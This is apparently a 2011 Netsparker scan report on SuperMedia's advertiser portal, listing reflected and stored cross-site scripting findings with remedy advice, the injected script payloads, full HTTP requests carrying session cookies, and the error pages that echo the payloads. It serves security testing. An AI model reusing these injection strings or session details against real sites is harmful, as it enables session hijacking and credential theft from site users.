&#039;pfp-keywords-flow&#039;, &#039;photos-flow&#039;, &#039;ppc-advsearch-flow&#039;, &#039;ppc-bidding-flow&#039;, &#039;ppc-create-flow&#039;, &#039;ppc-fullservice-flow&#039;, &#039;ppc-maintain-flow&#039;, &#039;repmanagement-flow&#039;, &#039;reviews-flow&#039;, &#039;sclicks-maintain-flow&#039;, &#039;sharethewealth-flow&#039;, &#039;temporary-password-flow&#039;, &#039;webhosting-addons-flow&#039;, &#039;webhosting-design-flow&#039;, &#039;webhosting-domainnames-flow&#039;, &#039;webhosting-email-products-flow&#039;, &#039;webhosting-websites-flow&#039;]
</div>

</div>
</div>
<div >























<!-- Footer Start -->

<!-- DROP DOWN START -->
<div id="dropDownShadow" ></div>
<div id="dropDownHolder" class="dropDownNavHolder">
</div>
<div class="nodisplay">
<div class="dropdown-content" id="online-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/business-listings/listing-enhancements-packages">Click packages</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/do-it-yourself">Do-it-yourself search marketing</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/services">Search marketing services</a></li>
<li><a href="https://www.supermedia.com/video-ads">Video ads</a></li>
<li><a href="https://www.supermedia.com/business-listings">Business listings</a></li>
<li><a href="https://www.supermedia.com/reputation-monitoring">Reputation monitoring</a></li>
<li><a href="https://www.supermedia.com/business-listings/coupons">Coupons</a></li>
</ul>
</div>

<div class="dropdown-content" id="print-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/print-advertising/yellow-pages">Yellow pages</a></li>
<li><a href="https://www.supermedia.com/print-advertising/white-pages">White pages</a></li>
<li><a href="https://www.supermedia.com/directory-options">Directory options</a></li>
</ul>
</div>

<div class="dropdown-content" id="direct-mail-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/direct-mail/postcards">Postcards</a></li>
<li><a href="https://www.supermedia.com/direct-mail/shared-card-packs">Shared card packs</a></li>
<li><a href="https://www.supermedia.com/direct-mail/call-tracking">Call tracking</a></li>
<li><a href="https://www.supermedia.com/direct-mail/compare-direct-mail-options">Compare options</a></li>
</ul>
</div>

<div class="dropdown-content" id="web-site-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/web-design">Web site design</a></li>
<li><a href="https://www.supermedia.com/web-hosting">Web site hosting</a></li>
<li><a href="https://www.supermedia.com/domain-names">Domain names</a></li>
<li><a href="https://www.supermedia.com/business-email">Business email</a></li>
</ul>
</div>

<div class="dropdown-content" id="packaged-solutions-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/packaged-solutions/multi-product-packages">Multi-product packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/business-profile-packages">Business profile packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/auto-dealer-packages">Auto dealer packages</a></li>
</ul>
</div>
</div>
<script type="text/javascript">
function addDropDownShadow(){
var IMAGEWIDTH=220,IMAGEHEIGHT=260,SHADOWSIZE=10;
var contentWidth = $("#dropDownHolder").width();
var contentHeight= $("#dropDownHolder").height();
var contentPos= $("#dropDownHolder").offset();

//set shadow position
$("#dropDownShadow").css("top",contentPos.top);
$("#dropDownShadow").css("left",contentPos.left-SHADOWSIZE);

//now add image aligned at bottom
var imgStyle=' style="position:relative;left:0px;top:'+(contentHeight+SHADOWSIZE-IMAGEHEIGHT)+'" ';
var imgHTML= '<img src="https://www.supermedia.com/img/img-spportal/supermedia/backgrounds/dropdown-shadow-fixed-width.png" '+imgStyle+' />';
//alert(imgHTML);
$("#dropDownShadow").css("height",contentHeight+SHADOWSIZE);
$("#dropDownShadow").html(imgHTML);
$("#dropDownShadow").show();
}
var dropDownTimerHandle;
function clearDropDownTimer(){
if(dropDownTimerHandle!=0){
clearTimeout(dropDownTimerHandle);
}
dropDownTimerHandle= 0;
}
function setDropDownTimer(){
dropDownTimerHandle= setTimeout(function(){
$("#dropDownHolder").hide();
$("#dropDownShadow").hide();
},1000);
}
$(document).ready(function(){
$("#globalnav-list li a").each(function(){
if(document.getElementById($(this).attr("id")+'-dropdown-content')){
$(this).mouseover(function(){
clearDropDownTimer();
var pos= $(this).offset();
$("#dropDownHolder").css("left",pos.left+1);
$("#dropDownHolder").css("top",pos.top+35);
var dropDownSel= '#'+$(this).attr("id")+'-dropdown-content';
$("#dropDownHolder").html($(dropDownSel).html());
$("#dropDownHolder").show();
addDropDownShadow();
});
$(this).mouseout(function(){
..
Cross-site Scripting

Cross-site Scripting

1 TOTAL
IMPORTANT
CONFIRMED
1
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hi-jacking users' active session
  • Changing the look of the page within the victims browser.
  • Mounting a successful phishing attack.
  • Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /spportal/spportalFlow.do

/spportal/spportalFlow.do CONFIRMED

https://www.supermedia.com/spportal/spportalFlow.do?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..

Parameters

Parameter Type Value
'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00029B)%3C/script%3E GET
Query Based QUERYSTRING '"--></style></script><script>alert(0x00029B)</script>

Request

GET /spportal/spportalFlow.do?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00029B)%3C/script%3E HTTP/1.1
Referer: http://www.supermedia.com/spportal/spportalFlow.do?fromPage=login&_flowId=loginact-flow
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.supermedia.com
Cookie: JSESSIONID=E1AC2AA3159FB94ADA25D554A846EBD5.app6-a1; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a423660; trafficSource=default; CstrStatus=U
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Sat, 19 Mar 2011 11:58:38 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Content-Encoding:
Content-Length: 5797






<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages - Error</title>



















<link rel="stylesheet" type="text/css" href="style/global.css" >
<link rel="stylesheet" type="text/css" href="style/form.css" >
<!--[if IE]>
<link rel="stylesheet" type="text/css" href="style/iehack.css" >
<![endif]-->
<script src="js/jquery/jquery.js" type="text/javascript"></script>
<script type="text/javascript" language="JavaScript" src="js/header.js"></script>
<script type="text/javascript" language="JavaScript" src="js/cookies.js"></script>
<script type="text/javascript" language="JavaScript" src="js/popupBlockerDetection.js"></script>
<script type="text/javascript" src="js/jquery/blockui.js"></script>





<META http-equiv=Content-Type content="text/html; charset=utf-8">
</head>
<body onload="" onunload="" onbeforeunload="">
<!-- specify omniture report suite for analytics -->
<!-- SiteCatalyst code version: H.1. Copyright 1997-2005 Omniture, Inc.More info available at http://www.omniture.com --><script type="text/javascript" language="javascript"> // use the appropriate account based on the server var s_account="Superpagesadvert";</script>
<!-- output omniture header -->
<!-- SiteCatalyst code version: H.14. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com --><script type="text/javascript" language="JavaScript" src="/spportal/js/s_code.js"></script><script type="text/javascript" language="JavaScript"><!--/* You may give each page an identifying name, server, and channel onthe next lines. */s.channel="";s.pagetype="";s.server="";s.referrer="https://www.supermedia.com/spportal/myaccount.do";s.pageName="";s.prop1="Processing Error Title";s.prop2="";s.prop3="Not Logged in";s.prop4="";s.prop5="";s.prop6="General Exception";s.prop7="Unable to extract the flow definition id parameter: make sure the client provides the '_flowId' parameter as input or set the 'defaultFlowId' property; the parameters provided in this request are: map[''"--></style></script><script>netsparker(0x00029B)</script>' -> '']";s.prop8="";s.prop9="";s.prop10="E1AC2AA3159FB94ADA25D554A846EBD5.app6-a1";s.prop11="";s.prop12="";s.prop13="";s.prop14="";s.prop15="";s.prop16="";s.prop17="";s.prop18="";s.prop19="";s.prop20="";s.prop21="";s.prop22="";s.prop23="";s.prop24="";s.prop25="";s.prop26="";s.prop27="";s.prop28="";s.prop29="";s.prop30="";/* Conversion Variables */s.zip="";s.purchaseID="";s.state="";s.events="";s.campaign="";s.products="";s.eVar1="";s.eVar2="";s.eVar3="";s.eVar4="";s.eVar5="";s.eVar6="";s.eVar7="";s.eVar8="";s.eVar9="";s.eVar10="";s.eVar11="";s.eVar12="";s.eVar13="";s.eVar14="";s.eVar15="";s.eVar16="";s.eVar17="";s.eVar18="";s.eVar19="";s.eVar20="";s.eVar21="";s.eVar22="";s.eVar23="";s.eVar24="";s.eVar25="";s.eVar26="";s.eVar27="";s.eVar28="";s.eVar29="";s.eVar30="";--></script>
<!-- Test & Target tracking - added 10/01 -->
<script type="text/javascript" src="js/mbox.js"></script>
<div >





























<!-- Header Start -->






















<!-- Javascript to capture buttons from the landing pages in omniture -->
<script language="javascript" type="text/JavaScript">

</script>
<!-- End of 'capture' omniture code -->
<!-- Code to find isSecurePage Start -->


<!-- Code to find isSecurePage End -->
<!-- Atlas Code Start -->


<script language="javascript" type="text/JavaScript">document.write('<s'+'cript language="JavaScript" src="https://view.atdmt.com/jaction/00asup_RetargetingSecure_1"></s'+'cript>')</script><noscript><iframe src="https://view.atdmt.com/iaction/00asup_RetargetingSecure_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" ></iframe></noscript>



<!-- Atlas Code End -->



<div id="header">
<div id="top">





<a href="https://www.supermedia.com" title="SuperMedia"><img alt="SuperMedia" src="https://www.supermedia.com/spportal/img-spportal/supermedia/banners/supermedia-logo.gif" width="173" height="55" border="0" class="title"/></a>



<div id="utility_nav">


<ul id="utility_nav-list">
<li><a href="https://www.supermedia.com/business-listings" title="Add/Edit A Free Listing">Add/Edit A Free Listing</a></li>
<li><a href="https://www.supermedia.com/about-us" title="About">About</a></li>
<li><a href="https://www.supermedia.com/help" class="utility" title="Support">Support</a></li>
<li>
<a href="https://www.supermedia.com/signin" title="Account Sign In"><b> Sign In</b></a>

</li>
</ul>


</div>



<div id="contactSalesDiv">
<!-- If not signed in show sales team info -->
<span id="customer-service-number">Order by phone&nbsp;(866) 311-4186</span>


</div>

<div id="globalnav">
<ul id="globalnav-list">



<li><a id="home" href="https://www.supermedia.com" title="Home">Home</a></li>
<li><a id="online-advertising" href="https://www.supermedia.com/online-advertising" title="Online Advertising">Online Advertising </a></li>
<li><a id="print-advertising" href="https://www.supermedia.com/print-advertising" title="Yellow Pages">Yellow Pages</a></li>
<li><a id="direct-mail" href="https://www.supermedia.com/direct-mail" title="Direct Mail">Direct Mail</a></li>
<li><a id="web-site" href="https://www.supermedia.com/web-sites" title="Web Sites">Web Sites</a></li>
<li><a id="packaged-solutions" href="https://www.supermedia.com/packaged-solutions" title="Packaged Solutions">Packaged Solutions</a></li>



</ul>
</div>
</div>
</div>






















<!-- Roll-over navigation menus -->


<!-- Header End -->





</div>
<div id="content-shadow" >
<div id="content" >

<!-- Setting the omniture page name --><script type="text/javascript" language="javascript"> s.pageName="Processing Error Title";</script>
<div id="bodyfooterwrap">
<h4>
An Error has occurred in this application. Please try back at a later time.
</h4>
Unable to extract the flow definition id parameter: make sure the client provides the &#039;_flowId&#039; parameter as input or set the &#039;defaultFlowId&#039; property; the parameters provided in this request are: map[&#039;&#039;&#034;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x00029B)&lt;/script&gt;&#039; -&gt; &#039;&#039;]
</div>

</div>
</div>
<div >























<!-- Footer Start -->

<!-- DROP DOWN START -->
<div id="dropDownShadow" ></div>
<div id="dropDownHolder" class="dropDownNavHolder">
</div>
<div class="nodisplay">
<div class="dropdown-content" id="online-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/business-listings/listing-enhancements-packages">Click packages</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/do-it-yourself">Do-it-yourself search marketing</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/services">Search marketing services</a></li>
<li><a href="https://www.supermedia.com/video-ads">Video ads</a></li>
<li><a href="https://www.supermedia.com/business-listings">Business listings</a></li>
<li><a href="https://www.supermedia.com/reputation-monitoring">Reputation monitoring</a></li>
<li><a href="https://www.supermedia.com/business-listings/coupons">Coupons</a></li>
</ul>
</div>

<div class="dropdown-content" id="print-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/print-advertising/yellow-pages">Yellow pages</a></li>
<li><a href="https://www.supermedia.com/print-advertising/white-pages">White pages</a></li>
<li><a href="https://www.supermedia.com/directory-options">Directory options</a></li>
</ul>
</div>

<div class="dropdown-content" id="direct-mail-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/direct-mail/postcards">Postcards</a></li>
<li><a href="https://www.supermedia.com/direct-mail/shared-card-packs">Shared card packs</a></li>
<li><a href="https://www.supermedia.com/direct-mail/call-tracking">Call tracking</a></li>
<li><a href="https://www.supermedia.com/direct-mail/compare-direct-mail-options">Compare options</a></li>
</ul>
</div>

<div class="dropdown-content" id="web-site-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/web-design">Web site design</a></li>
<li><a href="https://www.supermedia.com/web-hosting">Web site hosting</a></li>
<li><a href="https://www.supermedia.com/domain-names">Domain names</a></li>
<li><a href="https://www.supermedia.com/business-email">Business email</a></li>
</ul>
</div>

<div class="dropdown-content" id="packaged-solutions-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/packaged-solutions/multi-product-packages">Multi-product packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/business-profile-packages">Business profile packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/auto-dealer-packages">Auto dealer packages</a></li>
</ul>
</div>
</div>
<script type="text/javascript">
function addDropDownShadow(){
var IMAGEWIDTH=220,IMAGEHEIGHT=260,SHADOWSIZE=10;
var contentWidth = $("#dropDownHolder").width();
var contentHeight= $("#dropDownHolder").height();
var contentPos= $("#dropDownHolder").offset();

//set shadow position
$("#dropDownShadow").css("top",contentPos.top);
$("#dropDownShadow").css("left",contentPos.left-SHADOWSIZE);

//now add image aligned at bottom
var imgStyle=' style="position:relative;left:0px;top:'+(contentHeight+SHADOWSIZE-IMAGEHEIGHT)+'" ';
var imgHTML= '<img src="https://www.supermedia.com/img/img-spportal/supermedia/backgrounds/dropdown-shadow-fixed-width.png" '+imgStyle+' />';
//alert(imgHTML);
$("#dropDownShadow").css("height",contentHeight+SHADOWSIZE);
$("#dropDownShadow").html(imgHTML);
$("#dropDownShadow").show();
}
var dropDownTimerHandle;
function clearDropDownTimer(){
if(dropDownTimerHandle!=0){
clearTimeout(dropDownTimerHandle);
}
dropDownTimerHandle= 0;
}
function setDropDownTimer(){
dropDownTimerHandle= setTimeout(function(){
$("#dropDownHolder").hide();
$("#dropDownShadow").hide();
},1000);
}
$(document).ready(function(){
$("#globalnav-list li a").each(function(){
if(document.getElementById($(this).attr("id")+'-dropdown-content')){
$(this).mouseover(function(){
clearDropDownTimer();
var pos= $(this).offset();
$("#dropDownHolder").css("left",pos.left+1);
$("#dropDownHolder").css("top",pos.top+35);
var dropDownSel= '#'+$(this).attr("id")+'-dropdown-content';
$("#dropDownHolder").html($(dropDownSel).html());
$("#dropDownHolder").show();
addDropDownShadow();
});
$(this).mouseout(function(){
setDropDownTimer();
});
}
});
$("#dropDownHolder a").mouseover(function(){
clearDropDownTimer();
});
$("#dropDownHolder").mouseout(function(){
clearDropDownTimer();
setDropDownTimer();
});
$("#dropDownHolder").mouseover(function(){
clearDropDownTimer();
});
});
</script>
<!-- DROP DOWN END -->
<div id="footer" >




<div id="sitemap">

<div class="block first">


<h4>Company:</h4>
<ul>
<li><a href="https://www.supermedia.com/about-us" title="About Us">About Us</a></li>
<li><a href="https://www.supermedia.com/press" title="Press">Press</a></li>
<li><a href="http://ir.supermedia.com" title="Investors">Investors</a></li>
<li><a href="https://www.supermedia.com/careers" title="Careers">Careers</a></li>
<li><a href="https://www.supermedia.com/social-responsibility" title="Social Responsibility">Social Responsibility</a></li>
<li><a href="http://my.supermedia.com/directoryoptout" title="Directory Opt-out">Directory Opt-out</a></li>
</ul>



<h4>Client Solutions:</h4>
<ul>
<li><a href="https://www.supermedia.com/client-solutions/client-stories" title="Client Stories">Client Stories</a></li>
<li><a href="https://www.supermedia.com/client-solutions/local-service" title="Local Services">Local Services</a></li>
<li><a href="https://www.supermedia.com/client-solutions/local-retail" title="Local Retailers">Local Retailers</a></li>
<li><a href="https://www.supermedia.com/client-solutions/web-based-business" title="Web Businesses">Web Businesses</a></li>
<li><a href="https://www.supermedia.com/client-solutions/national-brand-agencies" title="National Brands & Agencies">National Brands &amp; Agencies</a></li>
<li><a href="https://www.supermedia.com/advertising-goals" title="Advertising Goals...">Advertising Goals...</a></li>
<li><a href="https://www.supermedia.com/client-solutions/share-the-wealth" title="Share the Wealth">Share the Wealth</a></li>
..
Permanent Cross-site Scripting

Permanent Cross-site Scripting

1 TOTAL
IMPORTANT
CONFIRMED
1

Netsparker confirmed this vulnerability by analyzing the execution of injected JavaScript.

Permanent XSS (Cross-site Scripting) allows an attacker to execute dynamic scripts (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly and to steal the user's credentials. This happens because the input entered by the user has been interpreted by HTML/Javascript/VbScript within the browser.

Permanent means that the attack will be stored in the back-end system. In normal XSS attacks an attack needs to e-mail the victim but in a permanent XSS an attacker can just execute the attack and wait for users to see the affected page. As soon as someone visits the page, the attacker's stored payload will get executed.

XSS targets the users of the application instead of the server. Although this is a limitation, since it only allows attackers to hijack other users' session the attacker might attack an administrator to gain full control over the application.

Impact

Permanent XSS is a dangerous issue that has many exploitation vectors, some of which includes:
  • User session sensitive information such as cookies can be stolen.
  • XSS can enable client-side worms which could modify, delete or steal other users' data within the application.
  • The website can be redirected to a new location, defaced or used as a phishing site.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /spportal/spportalFlow.do

/spportal/spportalFlow.do CONFIRMED

https://www.supermedia.com/spportal/spportalFlow.do?_flowId=response.write(268409241-22)%27

Injection URL

https://www.supermedia.com/spportal/spportalFlow.do?_flowId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00023F)%3C/script%3E

Injection Request

GET /spportal/spportalFlow.do?_flowId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00023F)%3C/script%3E HTTP/1.1
Referer: https://www.supermedia.com/spportal/forgotPwd.do
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.supermedia.com
Cookie: JSESSIONID=E1AC2AA3159FB94ADA25D554A846EBD5.app6-a1; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a423660; trafficSource=default; CstrStatus=U
Accept-Encoding: gzip, deflate

Identification Request

GET /spportal/spportalFlow.do?_flowId=response.write(268409241-22)%27 HTTP/1.1
Referer: https://www.supermedia.com/spportal/forgotPwd.do
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.supermedia.com
Cookie: JSESSIONID=E1AC2AA3159FB94ADA25D554A846EBD5.app6-a1; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a423660; trafficSource=default; CstrStatus=U
Accept-Encoding: gzip, deflate

Injection Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Sat, 19 Mar 2011 11:58:33 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Content-Encoding:
Content-Length: 6147


Identification Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Sat, 19 Mar 2011 11:58:32 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Content-Encoding:
Content-Length: 6294






<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages - Error</title>



















<link rel="stylesheet" type="text/css" href="style/global.css" >
<link rel="stylesheet" type="text/css" href="style/form.css" >
<!--[if IE]>
<link rel="stylesheet" type="text/css" href="style/iehack.css" >
<![endif]-->
<script src="js/jquery/jquery.js" type="text/javascript"></script>
<script type="text/javascript" language="JavaScript" src="js/header.js"></script>
<script type="text/javascript" language="JavaScript" src="js/cookies.js"></script>
<script type="text/javascript" language="JavaScript" src="js/popupBlockerDetection.js"></script>
<script type="text/javascript" src="js/jquery/blockui.js"></script>





<META http-equiv=Content-Type content="text/html; charset=utf-8">
</head>
<body onload="" onunload="" onbeforeunload="">
<!-- specify omniture report suite for analytics -->
<!-- SiteCatalyst code version: H.1. Copyright 1997-2005 Omniture, Inc.More info available at http://www.omniture.com --><script type="text/javascript" language="javascript"> // use the appropriate account based on the server var s_account="Superpagesadvert";</script>
<!-- output omniture header -->
<!-- SiteCatalyst code version: H.14. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com --><script type="text/javascript" language="JavaScript" src="/spportal/js/s_code.js"></script><script type="text/javascript" language="JavaScript"><!--/* You may give each page an identifying name, server, and channel onthe next lines. */s.channel="";s.pagetype="";s.server="";s.referrer="http://www.supermedia.com/spportal/forgotPwd.do";s.pageName="";s.prop1="Processing Error Title";s.prop2="";s.prop3="Not Logged in";s.prop4="";s.prop5="";s.prop6="General Exception";s.prop7="No such flow definition with id ''"--></style></script><script>netsparker(0x00023F)</script>' found; the flows available are: array<String>['accountAdmin-flow', 'accountreg-flow', 'businessprofile-flow', 'client-consolidation-flow', 'contactus-flow', 'coupon-flow', 'forgotpassword-edit-flow', 'funding-flow', 'lead-maintain-flow', 'listingOrderSummary-flow', 'login-flow', 'loginact-flow', 'maintaincreditcard-flow', 'microsite-flow', 'myaccount-contactinfo-edit-flow', 'myaccount-domains-flow', 'myaccount-email-edit-flow', 'myaccount-emails-flow', 'myaccount-flow', 'myaccount-password-edit-flow', 'myaccount-websites-flow', 'onlinecc-flow', 'ordersummary-flow', 'paypercall-flow', 'pfc-businessprofile-flow', 'pfc-flow', 'pfp-adDesign-flow', 'pfp-categories-flow', 'pfp-elp-flow', 'pfp-geo-flow', 'pfp-keywords-flow', 'photos-flow', 'ppc-advsearch-flow', 'ppc-bidding-flow', 'ppc-create-flow', 'ppc-fullservice-flow', 'ppc-maintain-flow', 'repmanagement-flow', 'reviews-flow', 'sclicks-maintain-flow', 'sharethewealth-flow', 'temporary-password-flow', 'webhosting-addons-flow', 'webhosting-design-flow', 'webhosting-domainnames-flow', 'webhosting-email-products-flow', 'webhosting-websites-flow']";s.prop8="";s.prop9="";s.prop10="E1AC2AA3159FB94ADA25D554A846EBD5.app6-a1";s.prop11="";s.prop12="";s.prop13="";s.prop14="";s.prop15="";s.prop16="";s.prop17="";s.prop18="";s.prop19="";s.prop20="";s.prop21="";s.prop22="";s.prop23="";s.prop24="";s.prop25="";s.prop26="";s.prop27="";s.prop28="";s.prop29="";s.prop30="";/* Conversion Variables */s.zip="";s.purchaseID="";s.state="";s.events="";s.campaign="";s.products="";s.eVar1="";s.eVar2="";s.eVar3="";s.eVar4="";s.eVar5="";s.eVar6="";s.eVar7="";s.eVar8="";s.eVar9="";s.eVar10="";s.eVar11="";s.eVar12="";s.eVar13="";s.eVar14="";s.eVar15="";s.eVar16="";s.eVar17="";s.eVar18="";s.eVar19="";s.eVar20="";s.eVar21="";s.eVar22="";s.eVar23="";s.eVar24="";s.eVar25="";s.eVar26="";s.eVar27="";s.eVar28="";s.eVar29="";s.eVar30="";--></script>
<!-- Test & Target tracking - added 10/01 -->
<script type="text/javascript" src="js/mbox.js"></script>
<div >





























<!-- Header Start -->






















<!-- Javascript to capture buttons from the landing pages in omniture -->
<script language="javascript" type="text/JavaScript">

</script>
<!-- End of 'capture' omniture code -->
<!-- Code to find isSecurePage Start -->


<!-- Code to find isSecurePage End -->
<!-- Atlas Code Start -->


<script language="javascript" type="text/JavaScript">document.write('<s'+'cript language="JavaScript" src="https://view.atdmt.com/jaction/00asup_RetargetingSecure_1"></s'+'cript>')</script><noscript><iframe src="https://view.atdmt.com/iaction/00asup_RetargetingSecure_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" ></iframe></noscript>



<!-- Atlas Code End -->



<div id="header">
<div id="top">





<a href="https://www.supermedia.com" title="SuperMedia"><img alt="SuperMedia" src="https://www.supermedia.com/spportal/img-spportal/supermedia/banners/supermedia-logo.gif" width="173" height="55" border="0" class="title"/></a>



<div id="utility_nav">


<ul id="utility_nav-list">
<li><a href="https://www.supermedia.com/business-listings" title="Add/Edit A Free Listing">Add/Edit A Free Listing</a></li>
<li><a href="https://www.supermedia.com/about-us" title="About">About</a></li>
<li><a href="https://www.supermedia.com/help" class="utility" title="Support">Support</a></li>
<li>
<a href="https://www.supermedia.com/signin" title="Account Sign In"><b> Sign In</b></a>

</li>
</ul>


</div>



<div id="contactSalesDiv">
<!-- If not signed in show sales team info -->
<span id="customer-service-number">Order by phone&nbsp;(866) 311-4186</span>


</div>

<div id="globalnav">
<ul id="globalnav-list">



<li><a id="home" href="https://www.supermedia.com" title="Home">Home</a></li>
<li><a id="online-advertising" href="https://www.supermedia.com/online-advertising" title="Online Advertising">Online Advertising </a></li>
<li><a id="print-advertising" href="https://www.supermedia.com/print-advertising" title="Yellow Pages">Yellow Pages</a></li>
<li><a id="direct-mail" href="https://www.supermedia.com/direct-mail" title="Direct Mail">Direct Mail</a></li>
<li><a id="web-site" href="https://www.supermedia.com/web-sites" title="Web Sites">Web Sites</a></li>
<li><a id="packaged-solutions" href="https://www.supermedia.com/packaged-solutions" title="Packaged Solutions">Packaged Solutions</a></li>



</ul>
</div>
</div>
</div>






















<!-- Roll-over navigation menus -->


<!-- Header End -->





</div>
<div id="content-shadow" >
<div id="content" >

<!-- Setting the omniture page name --><script type="text/javascript" language="javascript"> s.pageName="Processing Error Title";</script>
<div id="bodyfooterwrap">
<h4>
An Error has occurred in this application. Please try back at a later time.
</h4>
No such flow definition with id &#039;response.write(268409241-22)&#039;&#039; found; the flows available are: array&lt;String&gt;[&#039;accountAdmin-flow&#039;, &#039;accountreg-flow&#039;, &#039;businessprofile-flow&#039;, &#039;client-consolidation-flow&#039;, &#039;contactus-flow&#039;, &#039;coupon-flow&#039;, &#039;forgotpassword-edit-flow&#039;, &#039;funding-flow&#039;, &#039;lead-maintain-flow&#039;, &#039;listingOrderSummary-flow&#039;, &#039;login-flow&#039;, &#039;loginact-flow&#039;, &#039;maintaincreditcard-flow&#039;, &#039;microsite-flow&#039;, &#039;myaccount-contactinfo-edit-flow&#039;, &#039;myaccount-domains-flow&#039;, &#039;myaccount-email-edit-flow&#039;, &#039;myaccount-emails-flow&#039;, &#039;myaccount-flow&#039;, &#039;myaccount-password-edit-flow&#039;, &#039;myaccount-websites-flow&#039;, &#039;onlinecc-flow&#039;, &#039;ordersummary-flow&#039;, &#039;paypercall-flow&#039;, &#039;pfc-businessprofile-flow&#039;, &#039;pfc-flow&#039;, &#039;pfp-adDesign-flow&#039;, &#039;pfp-categories-flow&#039;, &#039;pfp-elp-flow&#039;, &#039;pfp-geo-flow&#039;, &#039;pfp-keywords-flow&#039;, &#039;photos-flow&#039;, &#039;ppc-advsearch-flow&#039;, &#039;ppc-bidding-flow&#039;, &#039;ppc-create-flow&#039;, &#039;ppc-fullservice-flow&#039;, &#039;ppc-maintain-flow&#039;, &#039;repmanagement-flow&#039;, &#039;reviews-flow&#039;, &#039;sclicks-maintain-flow&#039;, &#039;sharethewealth-flow&#039;, &#039;temporary-password-flow&#039;, &#039;webhosting-addons-flow&#039;, &#039;webhosting-design-flow&#039;, &#039;webhosting-domainnames-flow&#039;, &#039;webhosting-email-products-flow&#039;, &#039;webhosting-websites-flow&#039;]
</div>

</div>
</div>
<div >























<!-- Footer Start -->

<!-- DROP DOWN START -->
